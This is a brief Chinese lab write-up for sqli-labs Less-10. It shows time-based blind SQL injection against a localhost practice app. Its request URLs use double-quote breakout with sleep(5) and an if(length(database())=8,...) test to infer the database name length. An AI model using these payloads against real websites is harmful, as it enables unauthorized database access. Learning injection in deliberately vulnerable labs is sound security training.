sqli-labs (less-10)
输入
http://127.0.0.1/sql1/Less-10/?id=1 and sleep(5)--+ #快速执行
http://127.0.0.1/sql1/Less-10/?id=1' and sleep(5)--+ #快速执行
http://127.0.0.1/sql1/Less-10/?id=1" and sleep(5)--+ #休眠5秒
判断为字符型注入,这里因为也是不论输入什么都显示 You are in…,依然使用时间盲注
判断当前数据库长度
http://127.0.0.1/sql1/Less-10/?id=1" and if(length(database())=8,sleep(5),1)--+
我们发现当数据库长度设为8时,页面休眠5秒,判断当前数据库长度为8
然后利用同样方法继续往下面猜解,具体过程请看我的less-9